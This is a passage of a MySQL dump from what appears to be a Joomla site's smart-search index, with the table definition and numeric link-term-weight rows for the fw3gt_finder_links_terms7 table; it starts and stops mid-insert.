1563619,1.3334),(4664,1563620,3.2),(4732,1563620,3.2),(4761,1563620,3.2),(4664,1563621,3.5334),(4732,1563621,3.5334),(4761,1563621,3.5334),(4664,1563622,2.8),(4732,1563622,2.8),(4761,1563622,2.8),(4669,1564741,3.3334),(4673,1564862,0.9334),(4953,1564862,1.8668),(4673,1564863,1.2),(4734,1564863,1.2),(4673,1564864,3.0666),(4673,1564865,3.9334),(4673,1564866,1.2),(4673,1564867,3.1334),(4673,1564868,0.8),(4673,1564869,3.2666),(4673,1564870,3.6666),(4673,1564871,0.6666),(4673,1564872,3.1334),(4673,1564873,3.8),(4678,1565352,1.0666),(4678,1565353,2.9334),(4678,1565354,3.2666),(4678,1565355,0.9334),(4678,1565356,2.6),(4678,1565357,3.2),(4678,1565358,0.6666),(4678,1565359,2.6666),(4678,1565360,3.6),(4693,1569282,0.42),(4693,1569283,1.00331),(4693,1569284,1.07331),(4721,1602904,0.8),(4721,1604084,0.28),(4721,1604085,1.02669),(4721,1604086,1.07331),(4727,1605069,0.6666),(4778,1605069,0.6666),(4956,1605069,1.3332),(4727,1605070,2.8666),(4727,1605071,3.4666),(4727,1605072,1.2),(4764,1605072,1.2),(4732,1613361,3),(4734,1615850,3.1334),(4734,1615851,3.8666),(4734,1615852,0.8),(4734,1615853,3.1334),(4734,1615854,3.3334),(4734,1617680,0.18669),(4734,1617681,1.07331),(4734,1617682,1.21331),(4734,1617683,0.23331),(4734,1617684,0.88669),(4734,1617685,1.05),(4741,1621218,3.4666),(4741,1621243,0.18669),(4741,1621244,0.98),(4741,1621245,1.19),(4759,1623818,0.8),(4761,1627442,0.28),(4761,1627443,1.02669),(4761,1627444,1.28331),(4762,1628687,0.42),(4762,1628688,1.14331),(4762,1628689,1.4),(4762,1628690,0.74662),(4762,1628691,1.12),(4762,1628692,1.35331),(4762,1628693,1.05),(4762,1628694,1.23669),(4764,1629033,3.1334),(4764,1629034,3.8666),(4777,1629805,0.23331),(4777,1629806,0.86331),(4777,1629807,1.00331),(4778,1629860,3.1334),(4778,1629861,3.6),(4798,1643157,0.2666),(4803,1645133,0.28),(4927,1645133,0.28),(4803,1645134,0.91),(4803,1645135,1.05),(4803,1645136,0.28),(4803,1645137,0.88669),(4803,1645138,1.05),(4806,1645266,3.4666),(4808,1645353,0.8),(4808,1645354,3.2666),(4808,1645355,3.6666),(4837,1646506,2.1332),(4837,1646507,5.7332),(4837,1646508,6.4),(4849,1647431,0.28),(4849,1647432,1.02669),(4849,1647433,1.21331),(4850,1647944,5.8668),(4850,1647945,6.5332),(4851,1647976,6.9332),(4852,1648073,1.02),(4852,1648074,2.66339),(4852,1648075,3.11661),(4909,1672204,1.3332),(4909,1672205,6.2668),(4909,1672206,7.2),(4909,1672207,0.28),(4909,1672208,0.91),(4909,1672209,1.14331),(4909,1672481,0.37331),(4909,1672482,0.93331),(4909,1672483,0.98),(4917,1679369,0.23331),(4917,1679370,1.05),(4917,1679371,1.26),(4924,1680584,1.02),(4924,1680585,2.60661),(4927,1682723,1.6),(4927,1682724,5.7332),(4927,1682725,6.4),(4927,1683246,0.91),(4927,1683247,1.07331),(4935,1684022,1.6),(4935,1684023,5.4668),(4935,1684024,6.2668),(4940,1688700,0.28),(4940,1688701,1.07331),(4940,1688702,1.33),(4945,1689256,1.36),(4945,1689257,3.00339),(4945,1689258,3.34339),(4948,1689317,1.0668),(4948,1689318,5.2),(4948,1689319,6.2668),(4956,1689505,1.3332),(4956,1689506,5.4668);
/*!40000 ALTER TABLE `fw3gt_finder_links_terms6` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_finder_links_terms7`
--

DROP TABLE IF EXISTS `fw3gt_finder_links_terms7`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_finder_links_terms7` (
  `link_id` int(10) unsigned NOT NULL,
  `term_id` int(10) unsigned NOT NULL,
  `weight` float unsigned NOT NULL,
  PRIMARY KEY (`link_id`,`term_id`),
  KEY `idx_term_weight` (`term_id`,`weight`),
  KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_finder_links_terms7`
--

LOCK TABLES `fw3gt_finder_links_terms7` WRITE;
/*!40000 ALTER TABLE `fw3gt_finder_links_terms7` DISABLE KEYS */;
INSERT INTO `fw3gt_finder_links_terms7` VALUES (4569,1523611,0.32004),(4571,1523611,0.32004),(4572,1523611,0.32004),(4574,1523611,0.32004),(4585,1523611,0.32004),(4593,1523611,0.32004),(4594,1523611,0.32004),(4604,1523611,0.32004),(4608,1523611,0.32004),(4614,1523611,0.32004),(4616,1523611,0.32004),(4617,1523611,0.32004),(4624,1523611,0.32004),(4625,1523611,0.32004),(4626,1523611,0.32004),(4635,1523611,0.32004),(4653,1523611,0.32004),(4658,1523611,0.32004),(4661,1523611,0.32004),(4664,1523611,0.32004),(4669,1523611,0.32004),(4672,1523611,0.32004),(4673,1523611,0.32004),(4678,1523611,0.32004),(4687,1523611,0.32004),(4693,1523611,0.32004),(4710,1523611,0.32004),(4721,1523611,0.32004),(4723,1523611,0.32004),(4727,1523611,0.32004),(4732,1523611,0.32004),(4734,1523611,0.32004),(4735,1523611,0.32004),(4736,1523611,0.32004),(4741,1523611,0.32004),(4749,1523611,0.32004),(4753,1523611,0.32004),(4759,1523611,0.32004),(4761,1523611,0.32004),(4762,1523611,0.32004),(4764,1523611,0.32004),(4767,1523611,0.32004),(4770,1523611,0.32004),(4773,1523611,0.32004),(4776,1523611,0.32004),(4777,1523611,0.32004),(4778,1523611,0.32004),(4780,1523611,0.32004),(4798,1523611,0.32004),(4799,1523611,0.32004),(4803,1523611,0.32004),(4804,1523611,0.32004),(4806,1523611,0.32004),(4808,1523611,0.32004),(4809,1523611,0.32004),(4813,1523611,0.32004),(4814,1523611,0.32004),(4837,1523611,0.32004),(4839,1523611,0.32004),(4847,1523611,0.32004),(4849,1523611,0.32004),(4850,1523611,0.32004),(4851,1523611,0.32004),(4852,1523611,0.32004),(4857,1523611,0.32004),(4909,1523611,0.32004),(4917,1523611,0.32004),(4918,1523611,0.32004),(4924,1523611,0.32004),(4927,1523611,0.32004),(4928,1523611,0.32004),(4929,1523611,0.32004),(4930,1523611,0.32004),(4931,1523611,0.32004),(4934,1523611,0.32004),(4935,1523611,0.32004),(4938,1523611,0.32004),(4940,1523611,0.32004),(4945,1523611,0.32004),(4947,1523611,0.32004),(4948,1523611,0.32004),(4949,1523611,0.32004),(4951,1523611,0.32004),(4953,1523611,0.32004),(4954,1523611,0.32004),(4955,1523611,0.32004),(4956,1523611,0.32004),(4957,1523611,0.32004),(4721,1523802,0.14),(4762,1523802,0.14),(4777,1523802,0.14),(4917,1523802,0.14),(4940,1523802,0.14),(4538,1523802,0.34),(4734,1523802,0.42),(4761,1523802,0.42),(4653,1523802,0.68),(4538,1523803,2.21),(4552,1523935,0.14),(4755,1523935,0.24),(4552,1523937,0.14),(4755,1523937,0.24),(4552,1523938,0.86331),(4755,1523938,1.47996),(4569,1524826,0.90661),(4574,1524826,0.90661),(4569,1524827,0.45339),(4948,1524827,0.45339),(4569,1524828,2.38),(4569,1524829,2.77661),(4569,1524830,0.18669),(4569,1524831,0.88669),(4569,1524832,1.16669),(4569,1524833,0.37331),(4571,1524833,0.37331),(4572,1524833,0.37331),(4661,1524833,0.37331),(4669,1524833,0.37331),(4741,1524833,0.37331),(4749,1524833,0.37331),(4753,1524833,0.37331),(4839,1524833,0.37331),(4847,1524833,0.37331),(4851,1524833,0.37331),(4852,1524833,0.37331),(4857,1524833,0.37331),(4938,1524833,0.37331),(4569,1524834,1.16669),(4571,1524834,1.16669),(4572,1524834,1.16669),(4661,1524834,1.16669),(4669,1524834,1.16669),(4741,1524834,1.16669),(4749,1524834,1.16669),(4753,1524834,1.16669),(4839,1524834,1.16669),(4847,1524834,1.16669),(4851,1524834,1.16669),(4852,1524834,1.16669),(4569,1524835,1.21331),(4571,1524835,1.21331),(4572,1524835,1.21331),(4661,1524835,1.21331),(4669,1524835,1.21331),(4741,1524835,1.21331),(4749,1524835,1.21331),(4753,1524835,1.21331),(4839,1524835,1.21331),(4847,1524835,1.21331),(4851,1524835,1.21331),(4852,1524835,1.21331),(4569,1524836,0.46669),(4669,1524836,0.46669),(4693,1524836,0.46669),(4741,1524836,0.46669),(4940,1524836,0.46669),(4569,1524837,1.05),(4569,1524838,1.14331),(4571,1524992,0.79339),(4571,1524993,0.09331),(4572,1524993,0.09331),(4604,1524993,0.09331),(4608,1524993,0.09331),(4614,1524993,0.09331),(4616,1524993,0.09331),(4624,1524993,0.09331),(4625,1524993,0.09331),(4626,1524993,0.09331),(4661,1524993,0.09331),(4721,1524993,0.09331),(4761,1524993,0.09331),(4762,1524993,0.09331),(4917,1524993,0.09331),(4940,1524993,0.09331),(4617,1524993,0.18662),(4693,1524993,0.18662),(4734,1524993,0.18662),(4798,1524993,0.18662),(4938,1524993,0.18662),(4664,1524993,0.22661),(4732,1524993,0.22661),(4571,1524994,0.84),(4661,1524994,0.84),(4571,1524995,1.12),(4661,1524995,1.12),(4571,1524996,0.51331),(4572,1524996,0.51331),(4661,1524996,0.51331),(4571,1524997,1.09669),(4572,1524997,1.09669),(4661,1524997,1.09669),(4571,1524998,1.19),(4572,1524998,1.19),(4661,1524998,1.19),(4572,1525015,0.51331),(4572,1525025,0.79339),(4572,1525026,0.84),(4572,1525027,1.12),(4574,1525110,0.1334),(4678,1525110,0.1334),(4732,1525110,0.1334),(4734,1525110,0.1334),(4735,1525110,0.1334),(4574,1525111,2.6666),(4574,1525112,2.8666),(4574,1525119,2.32339),(4574,1525120,2.72),(4734,1525186,0.51331),(4580,1526277,0.8),(4837,1526277,0.8),(4849,1526277,0.8),(4850,1526277,0.8),(4909,1526277,0.8),(4917,1526277,0.8),(4918,1526277,0.8),(4924,1526277,0.8),(4927,1526277,0.8),(4928,1526277,0.8),(4929,1526277,0.8),(4934,1526277,0.8),(4935,1526277,0.8),(4938,1526277,0.8),(4940,1526277,0.8),(4945,1526277,0.8),(4951,1526277,0.8),(4953,1526277,0.8),(4956,1526277,0.8),(4580,1526278,2.5334),(4837,1526278,2.5334),(4849,1526278,2.5334),(4850,1526278,2.5334),(4909,1526278,2.5334),(4917,1526278,2.5334),(4918,1526278,2.5334),(4924,1526278,2.5334),(4927,1526278,2.5334),(4928,1526278,2.5334),(4929,1526278,2.5334),(4934,1526278,2.5334),(4935,1526278,2.5334),(4938,1526278,2.5334),(4940,1526278,2.5334),(4945,1526278,2.5334),(4951,1526278,2.5334),(4953,1526278,2.5334),(4956,1526278,2.5334),(4581,1526281,0.74),(4593,1527362,0.9334),(4593,1527363,2.8666),(4593,1527402,0.68),(4593,1527403,2.32339),(4593,1527404,2.89),(4594,1527599,0.23331),(4594,1527600,0.95669),(4594,1527601,1.12),(4594,1527602,0.37331),(4909,1527602,0.37331),(4594,1527603,1.05),(4594,1527604,1.35331),(4594,1527605,0.37331),(4594,1527606,1.12),(4594,1527607,1.35331),(4594,1527608,0.45339),(4594,1527609,2.38),(4594,1527610,2.55),(4594,1527611,0.23331),(4849,1527611,0.23331),(4594,1527612,1.05),(4594,1527613,1.33),(4594,1527614,0.28),(4594,1527615,0.98),(4594,1527616,1.21331),(4594,1527617,0.37331),(4594,1527618,0.95669),(4594,1527619,1.16669),(4594,1527620,0.46669),(4594,1527621,1.09669),(4594,1527622,1.23669),(4626,1527623,0.42),(4594,1527623,1.26),(4594,1527624,1.12),(4594,1527625,1.19),(4594,1527626,1.19),(4594,1527627,1.26),(4594,1527628,1.09669),(4594,1527629,1.19),(4594,1527630,0.42),(4604,1527630,0.42),(4617,1527630,0.42),(4625,1527630,1.68),(4626,1527630,2.94),(4594,1527631,0.98),(4594,1527632,1.23669),(4604,1529255,0.28),(4608,1529255,0.28),(4614,1529255,0.28),(4616,1529255,0.28),(4617,1529255,0.28),(4604,1529298,0.32669),(4608,1529298,0.32669),(4614,1529298,0.32669),(4616,1529298,0.32669),(4624,1529298,0.32669),(4626,1529298,0.98007),(4604,1529304,0.09331),(4608,1529304,0.09331),(4614,1529304,0.09331),(4616,1529304,0.09331),(4617,1529304,0.09331),(4625,1529304,0.09331),(4604,1529305,0.88669),(4608,1529305,0.88669),(4614,1529305,0.88669),(4616,1529305,0.88669),(4617,1529305,0.88669),(4625,1529305,0.88669),(4604,1529306,1.16669),(4608,1529306,1.16669),(4614,1529306,1.16669),(4617,1529306,1.16669),(4625,1529306,1.16669),(4604,1529325,0.51331),(4608,1529325,0.51331),(4614,1529325,0.51331),(4617,1529325,0.51331),(4625,1529325,0.51331),(4626,1529325,0.51331),(4604,1529328,0.37331),(4608,1529328,0.37331),(4625,1529328,0.37331),(4604,1529329,0.95669),(4608,1529329,0.95669),(4625,1529329,0.95669),(4604,1529330,1.09669),(4608,1529330,1.09669),(4625,1529330,1.09669),(4604,1529331,0.65331),(4608,1529331,0.65331),(4614,1529331,0.65331),(4625,1529331,0.65331),(4626,1529331,0.65331),(4604,1529332,1.09669),(4608,1529332,1.09669),(4614,1529332,1.09669),(4625,1529332,1.09669),(4604,1529334,0.37331),(4625,1529334,0.37331),(4938,1529334,0.37331),(4940,1529334,0.37331),(4608,1529334,0.74662),(4614,1529334,1.86655),(4616,1529334,1.86655),(4626,1529334,2.61317),(4604,1529339,0.28),(4608,1529339,0.56),(4616,1529339,0.56),(4625,1529339,0.56),(4604,1536283,0.42),(4626,1536283,0.42),(4604,1536284,1.23669),(4604,1536285,1.4),(4604,1536286,0.91),(4614,1536286,0.91),(4616,1536286,0.91),(4604,1536287,0.98),(4616,1536287,0.98),(4604,1536288,0.42),(4604,1536289,0.95669),(4604,1536290,1.19),(4604,1536291,0.81669),(4616,1536291,0.81669),(4625,1536291,0.81669),(4604,1536292,0.91),(4604,1536293,1.05),(4604,1536294,1.23669),(4604,1536295,0.51331),(4604,1536296,1.09669),(4604,1536297,1.16669),(4624,1536298,0.37331),(4626,1536298,0.74662),(4625,1536298,1.11993),(4604,1536298,1.27992),(4616,1536298,1.27992),(4617,1536298,2.02654),(4798,1536298,3.14647),(4604,1536299,1.07331),(4604,1536300,1.26),(4604,1536301,0.98),(4625,1536301,1.96),(4626,1536301,4.9),(4604,1536302,1.02669),(4626,1536302,5.13345),(4604,1536303,1.00331),(4625,1536303,1.00331),(4626,1536303,1.00331),(4604,1536304,1.12),(4625,1536304,1.12),(4626,1536304,1.12),(4604,1536305,0.51331),(4616,1536305,0.51331),(4604,1536306,1.05),(4616,1536306,1.05),(4604,1536307,1.35331),(4604,1536308,0.56),(4604,1536309,1.19),(4604,1536310,1.26),(4604,1536311,0.42),(4604,1536312,1.07331),(4604,1536313,1.14331),(4604,1536314,0.42),(4604,1536315,0.98),(4604,1536316,1.19),(4604,1536317,0.46662),(4604,1536318,1.00331),(4604,1536319,1.09669),(4604,1536320,1.02669),(4604,1536321,1.4),(4604,1536322,1.4),(4625,1536322,1.4),(4604,1536323,0.98),(4604,1536324,1.07331),(4604,1536325,0.56),(4614,1536325,0.56),(4616,1536325,1.12),(4617,1536325,1.12),(4604,1536326,1.05),(4614,1536326,1.05),(4604,1536327,1.28331),(4614,1536327,1.28331),(4604,1536328,1.12),(4604,1536329,1.35331),(4604,1536330,0.23331),(4617,1536330,0.23331),(4614,1536330,0.69993),(4625,1536330,0.93324),(4604,1536331,1.09669),(4604,1536332,1.19),(4608,1540452,0.93338),(4608,1540453,2.33338),(4608,1540454,2.47338),(4625,1540455,0.42),(4608,1540455,0.84),(4625,1540456,1.09669),(4608,1540456,2.19338),(4608,1540457,1.23669),(4608,1540458,1.4),(4608,1540459,0.88669),(4608,1540460,1.19),(4608,1540461,0.28),(4761,1540461,0.28),(4608,1540462,0.91),(4608,1540463,1.07331),(4608,1540464,0.28),(4626,1540464,0.28),(4940,1540464,0.28),(4938,1540464,0.56),(4608,1540465,1.02669),(4608,1540466,1.07331),(4608,1540467,0.32669),(4608,1540468,1.12),(4608,1540469,1.16669),(4608,1540470,0.28),(4608,1540471,1.19),(4608,1540472,1.26),(4608,1540473,0.37331),(4608,1540474,1.02669),(4608,1540475,1.07331),(4608,1540476,0.84),(4608,1540477,0.95669),(4608,1540478,0.74662),(4608,1540479,2.14662),(4608,1540480,2.24),(4608,1540481,1.02662),(4940,1540481,1.02662),(4608,1540482,2.52),(4608,1540483,2.8),(4608,1540484,0.93338),(4608,1540485,2.33338),(4608,1540486,2.70662),(4625,1540487,0.32669),(4608,1540487,0.65338),(4608,1540488,1.00331),(4608,1540489,1.09669),(4608,1540490,1.16669),(4608,1540491,1.4),(4608,1540492,0.65331),(4608,1540493,1.09669),(4608,1540494,1.19),(4608,1540495,0.23331),(4608,1540496,1.00331),(4608,1540497,1.23669),(4608,1540498,0.98),(4608,1540499,1.21331),(4608,1540500,0.42),(4608,1540501,1.26),(4608,1540502,1.4),(4608,1540503,0.14),(4608,1540504,0.98),(4608,1540505,1.21331),(4608,1540506,0.79339),(4608,1540507,2.32339),(4608,1540508,2.77661),(4608,1540509,1.86655),(4608,1540510,1.07331),(4608,1540511,0.95669),(4608,1540512,1.00331),(4608,1540513,2.19338),(4608,1540514,2.70662),(4608,1540515,0.95669),(4608,1540516,1.21331),(4608,1540517,0.14),(4940,1540517,0.14),(4616,1540517,0.28),(4617,1540517,0.28),(4624,1540517,0.28),(4734,1540517,0.42),(4614,1540517,0.56),(4625,1540517,0.56),(4626,1540517,0.56),(4798,1540517,0.56),(4608,1540518,1.05),(4614,1540518,1.05),(4626,1540518,2.1),(4608,1540519,1.14331),(4626,1540519,2.28662),(4608,1540520,1.02669),(4614,1540520,1.02669),(4608,1540521,1.21331),(4614,1540521,1.21331),(4608,1540522,1.19),(4608,1540523,1.07331),(4608,1540524,1.33),(4608,1540525,1.00331),(4608,1540526,1.4),(4608,1540527,1.82),(4608,1540528,2.1),(4614,1546233,1.2),(4614,1546783,0.14),(4625,1546783,0.14),(4734,1546783,0.14),(4721,1546783,0.42),(4614,1546784,0.86331),(4625,1546784,0.86331),(4734,1546784,0.86331),(4614,1546785,1.12),(4849,1546786,0.46669),(4917,1546786,0.46669),(4614,1546786,0.93338),(4614,1546787,1.28331),(4614,1546788,1.33),(4614,1546789,1.14331),(4614,1546790,1.4),(4614,1546791,0.74662),(4614,1546792,1.21331),(4614,1546793,1.37669),(4614,1546794,1.23669),(4614,1546795,1.4),(4614,1546796,0.51331),(4614,1546797,1.23669),(4614,1546798,1.30669),(4614,1546799,0.42),(4614,1546800,1.26),(4614,1546801,1.4),(4614,1546802,0.46669),(4614,1546803,1.05),(4614,1546804,1.12),(4614,1546805,0.23331),(4614,1546806,1.05),(4614,1546807,1.4),(4614,1546808,0.95669),(4614,1546809,0.51331),(4614,1546810,1.14331),(4614,1546811,1.26),(4614,1546812,0.46669),(4617,1546812,0.46669),(4624,1546812,0.46669),(4626,1546812,0.46669),(4614,1546813,0.98),(4614,1546814,1.14331),(4614,1546815,0.32669),(4614,1546816,0.95669),(4614,1546817,1.28331),(4614,1546818,0.28),(4614,1546819,0.95669),(4614,1546820,1.00331),(4614,1546821,0.28),(4626,1546821,1.12),(4614,1546822,0.95669),(4626,1546822,3.82676),(4614,1546823,1.00331),(4614,1546824,0.28),(4626,1546824,0.28),(4614,1546825,0.98),(4626,1546825,0.98),(4614,1546826,1.07331),(4626,1546826,1.07331),(4614,1546827,0.46669),(4626,1546827,0.46669),(4614,1546828,1.09669),(4614,1546829,1.16669),(4614,1546830,0.79331),(4617,1546830,0.79331),(4614,1546831,0.84),(4614,1546832,0.42),(4614,1546833,1.14331),(4614,1546834,1.4),(4614,1546835,0.46669),(4734,1546835,0.46669),(4614,1546836,1.07331),(4614,1546837,1.19),(4614,1546838,0.46669),(4614,1546839,1.21331),(4614,1546840,1.37669),(4614,1546841,0.42),(4614,1546842,1.05),(4614,1546843,1.14331),(4614,1546844,0.32669),(4614,1546845,1.05),(4614,1546846,1.23669),(4614,1546847,0.95669),(4614,1546848,1.14331),(4614,1546849,0.46669),(4614,1546850,1.21331),(4614,1546851,1.26),(4614,1546852,0.46669),(4614,1546853,1.02669),(4614,1546854,1.28331),(4614,1546855,0.51331),(4614,1546856,1.12),(4614,1546857,1.35331),(4614,1546858,1.09669),(4616,1546858,1.09669),(4626,1546858,1.09669),(4614,1546859,1.37669),(4614,1546860,1.02669),(4614,1546861,1.30669),(4614,1546862,1.00331),(4614,1546863,1.23669),(4614,1546864,1.12),(4614,1546865,0.60669),(4614,1546866,1.16669),(4614,1546867,1.4),(4614,1546868,0.42),(4614,1546869,1.12),(4614,1546870,1.23669),(4614,1546871,0.65331),(4614,1546872,1.4),(4614,1546873,1.4),(4614,1546874,0.65331),(4614,1546875,1.07331),(4614,1546876,1.37669),(4614,1546877,1.4),(4614,1546878,0.98),(4614,1546879,1.09669),(4614,1546880,1.00331),(4614,1546881,1.12),(4614,1546882,3.00993),(4614,1546883,1.21331),(4614,1546884,1.16669),(4614,1546885,1.07331),(4614,1546886,0.65331),(4614,1546887,1.16669),(4614,1546888,1.37669),(4614,1546889,0.32669),(4614,1546890,1.19),(4614,1546891,1.4),(4614,1546892,0.37331),(4614,1546893,1.12),(4614,1546894,1.37669),(4614,1546895,0.88669),(4614,1546896,1.09669),(4614,1546897,0.98),(4614,1546898,1.35331),(4614,1546899,1.16669),(4614,1546900,1.35331),(4616,1547923,0.42),(4616,1547924,1.16669),(4616,1547925,1.30669),(4616,1547926,0.23331),(4617,1547926,0.23331),(4626,1547926,0.23331),(4927,1547926,0.23331),(4625,1547926,0.93324),(4721,1547926,0.93324),(4616,1547927,1.12),(4616,1547928,1.26),(4616,1547929,0.32669),(4616,1547930,1.12),(4616,1547931,1.23669),(4616,1547932,0.91),(4616,1547933,0.23331),(4616,1547934,1.00331),(4616,1547935,1.05),(4616,1547936,1.21331),(4616,1547937,1.4),(4616,1547938,0.32669),(4616,1547939,1.09669),(4616,1547940,1.26),(4616,1547941,1.09669),(4798,1547942,0.98),(4616,1547942,2.38),(4616,1547943,3.00339),(4616,1547944,1.07331),(4625,1547944,1.07331),(4616,1547945,1.26),(4616,1547946,0.95669),(4616,1547947,1.09669),(4616,1547948,1.33),(4616,1547949,1.26),(4616,1547950,0.93331),(4625,1547950,0.93331),(4616,1547951,1.05),(4616,1547952,0.93331),(4626,1547952,1.86662),(4616,1547953,1.05),(4616,1547954,0.93331),(4626,1547954,0.93331),(4616,1547955,1.05),(4616,1547956,0.98),(4616,1547957,1.09669),(4616,1547958,1.00331),(4616,1547959,1.12),(4616,1547960,1.02669),(4616,1547961,1.21331),(4616,1547962,1.21331),(4616,1547963,1.30669),(4616,1547964,0.93331),(4625,1547964,0.93331),(4616,1547965,1.26),(4616,1547966,1.12),(4616,1547967,1.21331),(4617,1548368,0.51331),(4617,1548369,1.28331),(4617,1548370,1.4),(4617,1548371,0.88669),(4617,1548372,1.19),(4617,1548373,0.91),(4617,1548374,1.07331),(4617,1548375,1.26),(4617,1548376,1.33),(4617,1548377,1.00331),(4617,1548378,0.81669),(4624,1548378,0.81669),(4626,1548378,0.81669),(4617,1548379,1.02669),(4617,1548380,0.51331),(4617,1548381,1.09669),(4617,1548382,1.14331),(4617,1548383,0.46669),(4617,1548384,1.07331),(4617,1548385,1.16669),(4617,1548386,1.21338),(4617,1548387,1.05),(4617,1548388,1.35331),(4617,1548389,1.07331),(4617,1548390,1.37669),(4617,1548391,1.27992),(4617,1548392,1.26),(4617,1548393,1.4),(4617,1548394,2.89),(4617,1548395,3.4),(4617,1548396,0.60669),(4617,1548397,1.14331),(4617,1548398,1.21331),(4617,1548399,0.98),(4617,1548400,1.12),(4617,1548401,2.38),(4617,1548402,1.28331),(4617,1548403,1.4),(4617,1548404,0.51331),(4617,1548405,1.33),(4617,1548406,1.4),(4617,1548407,0.98),(4617,1548408,1.16669),(4617,1548409,0.98),(4617,1548410,1.28331),(4617,1548411,0.95669),(4617,1548412,1.14331),(4617,1548413,1.09669),(4617,1548414,1.19),(4617,1548415,1.33),(4617,1548416,1.4),(4617,1548417,1.23669),(4617,1548418,1.4),(4617,1548419,0.86331),(4617,1548420,1.00331),(4624,1553983,0.09331),(4624,1553984,1.09669),(4624,1553985,1.16669),(4624,1554317,0.28),(4624,1554318,0.91),(4624,1554319,1.19),(4624,1554320,0.98),(4624,1554321,1.09669),(4624,1554322,1.11993),(4624,1554323,1.02669),(4624,1554324,1.4),(4624,1554325,2.00662),(4624,1554326,1.05),(4624,1554327,1.21331),(4624,1554328,0.86331),(4624,1554329,0.46669),(4624,1554330,1.33),(4624,1554331,1.37669),(4624,1554332,0.95669),(4624,1554333,1.12),(4624,1554334,0.37331),(4624,1554335,1.12),(4624,1554336,1.16669),(4624,1554337,0.7),(4624,1554338,1.14331),(4624,1554339,1.28331),(4624,1554340,1.12),(4624,1554341,1.19),(4624,1554342,2.52),(4624,1554343,1.96),(4624,1554344,2.1),(4624,1554345,2.47338),(4624,1554346,2.56662),(4624,1554347,0.95669),(4624,1554348,1.16669),(4624,1554349,1.12),(4624,1554350,1.4),(4624,1554351,1.00331),(4624,1554352,1.23669),(4624,1554353,1.05),(4624,1554354,1.12),(4624,1554355,0.46669),(4798,1554355,0.46669),(4624,1554356,1.12),(4624,1554357,1.30669),(4624,1554358,0.46669),(4798,1554358,0.46669),(4624,1554359,0.98),(4624,1554360,1.28331),(4624,1554361,0.42),(4624,1554362,1.00331),(4624,1554363,1.19),(4798,1554364,0.84),(4624,1554364,1.68),(4624,1554365,0.95669),(4624,1554366,1.00331),(4624,1554367,0.98),(4624,1554368,1.14331),(4624,1554369,1.09669),(4624,1554370,1.21331),(4624,1554371,0.95669),(4624,1554372,1.12),(4624,1554373,0.60669),(4624,1554374,1.09669),(4624,1554375,1.37669),(4624,1554376,0.46669),(4624,1554377,1.30669),(4624,1554378,1.4),(4624,1554379,0.46669),(4624,1554380,1.19),(4624,1554381,1.4),(4624,1554382,0.28),(4624,1554383,1.12),(4624,1554384,1.35331),(4624,1554385,0.7),(4798,1554385,0.7),(4624,1554386,1.33),(4624,1554387,1.4),(4624,1554388,0.7),(4624,1554389,1.28331),(4624,1554390,1.4),(4624,1554391,0.7),(4624,1554392,1.4),(4624,1554393,1.4),(4625,1554882,0.28),(4625,1554883,1.12),(4625,1554884,1.33),(4625,1554885,0.37331),(4625,1554886,1.14331),(4625,1554887,1.35331),(4625,1555250,1.09669),(4625,1555251,1.16669),(4625,1555252,1.07331),(4625,1555253,1.26),(4625,1555254,3.00993),(4625,1555255,2.52),(4625,1555256,1.14331),(4625,1555257,0.23331),(4625,1555258,1.00331),(4625,1555259,1.05),(4625,1555260,0.37331),(4625,1555261,0.98),(4625,1555262,1.26),(4625,1555263,0.51331),(4625,1555264,1.02669),(4625,1555265,1.14331),(4625,1555266,0.37331),(4625,1555267,0.93331),(4625,1555268,1.14331),(4625,1555269,0.37331),(4625,1555270,1.05),(4625,1555271,1.21331),(4625,1555272,0.37331),(4625,1555273,1.09669),(4625,1555274,1.33),(4625,1555275,0.88669),(4625,1555276,0.32669),(4625,1555277,1.09669),(4625,1555278,1.33),(4625,1555279,0.42),(4625,1555280,1.05),(4625,1555281,1.14331),(4625,1555282,0.93331),(4625,1555283,1.07331),(4625,1555284,0.42),(4625,1555285,1.09669),(4625,1555286,1.16669),(4625,1555287,0.32669),(4626,1555287,0.32669),(4625,1555288,0.91),(4626,1555288,0.91),(4625,1555289,1.09669),(4625,1555290,0.42),(4625,1555291,1.14331),(4625,1555292,1.21331),(4625,1555293,0.42),(4625,1555294,1.14331),(4625,1555295,1.21331),(4625,1555296,0.51331),(4625,1555297,1.16669),(4625,1555298,1.37669),(4625,1555299,0.23331),(4625,1555300,1.05),(4625,1555301,1.19),(4625,1555302,1.21331),(4625,1555303,1.4),(4625,1555304,1.21331),(4625,1555305,0.98),(4625,1555306,1.16669),(4626,1555307,0.46669),(4625,1555307,1.40007),(4625,1555308,1.19),(4625,1555309,1.26),(4625,1555310,1.07331),(4625,1555311,1.14331),(4625,1555312,1.21331),(4625,1555313,1.37669),(4625,1555314,1.16669),(4625,1555315,1.37669),(4625,1555316,1.16669),(4625,1555317,1.12),(4625,1555318,1.07331),(4625,1555319,1.14331),(4625,1555320,1.05),(4625,1555321,1.28331),(4625,1555322,0.98),(4625,1555323,1.26),(4625,1555324,0.91),(4625,1555325,1.14331),(4625,1555326,0.98),(4625,1555327,1.33),(4625,1555328,0.46669),(4625,1555329,1.00331),(4625,1555330,1.07331),(4625,1555331,0.32669),(4625,1555332,0.93331),(4625,1555333,1.16669),(4625,1555334,0.7),(4625,1555335,1.19),(4625,1555336,1.4),(4625,1555337,0.42),(4625,1555338,1.05),(4625,1555339,1.19),(4625,1555340,1.07331),(4625,1555341,0.56),(4635,1555341,1.36),(4625,1555342,1.16669),(4625,1555343,1.23669),(4625,1555344,0.42),(4625,1555345,1.05),(4625,1555346,1.28331),(4625,1555347,0.98),(4625,1555348,1.16669),(4625,1555349,1.14331),(4625,1555350,0.56),(4625,1555351,1.14331),(4625,1555352,1.4),(4625,1555353,1.02669),(4625,1555354,1.07331),(4625,1555355,0.86331),(4625,1555356,1.09669),(4625,1555357,1.05),(4625,1555358,1.21331),(4625,1555359,0.95669),(4625,1555360,1.14331),(4625,1555361,1.07331),(4625,1555362,1.33),(4625,1555363,0.23331),(4625,1555364,0.88669),(4625,1555365,1.23669),(4625,1555366,0.56),(4625,1555367,1.05),(4625,1555368,1.26),(4625,1555369,0.60669),(4625,1555370,1.07331),(4625,1555371,1.16669),(4626,1556019,0.18669),(4626,1556020,1.19),(4626,1556021,1.4